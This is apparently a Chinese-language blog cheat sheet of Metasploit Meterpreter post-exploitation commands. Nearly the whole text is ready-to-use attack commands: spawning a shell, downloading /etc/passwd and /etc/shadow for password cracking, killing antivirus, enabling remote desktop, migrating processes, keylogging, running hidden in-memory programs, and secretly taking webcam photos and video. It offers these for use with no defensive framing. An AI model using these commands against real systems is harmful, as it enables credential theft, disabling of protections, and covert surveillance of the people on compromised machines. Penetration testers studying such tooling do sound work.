说明
Meterpreter是一种后渗透工具,它强大的安全界无人不知,简直就是必备必学必用黑客工具。本文主要来说一下msf在后渗透中的常用命令(方便查询,故此记录)
常用命令
通过python获取可交互的shell
shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
下载目标密码(用 unshaow 混合 passwd和shadow 文件,再用john命令获得用户名密码)
download /etc/passwd 下载密码文件到home目录
download /etc/shadow
查看目标机的系统信息
sysinfo
查看目标鸡是否允许在虚拟机上
run post/windows/gather/checkvm
查看完整的网络连接
route
关闭杀毒软件
run post/windows/manage/killav
启动目标机的远程桌面协议,开启3389端口:
run post/windows/manage/enable_rdp
列举当前登陆过的用户
run post/windows/gather/enum_logged_on_users
进程迁移 先执行ps -ef查看进程
migrate 4686
列举安装的程序
run post/windows/gather/enum_applications
截屏
screenshot
键盘记录
keyscan_start:开启键盘记录功能
keyscan_dump:显示捕捉到的键盘记录信息
keyscan_stop:停止键盘记录功能
执行程序
execute -h 查看使用方法
-H:创建一个隐藏进程
-a:传递给命令的参数
-i:跟进程进行交互
-m:从内存中执行
-t:使用当前伪造的线程令牌运行进程
-s:在给定会话中执行进程
例:execute -f c:/temp/hello.exe
查看靶机是否有摄像头
webcam_list
打开靶机摄像头拍一张照片
webcam_snap
开启直播模式,抓取视频
webcam_stream
暂时就这些
更多请参考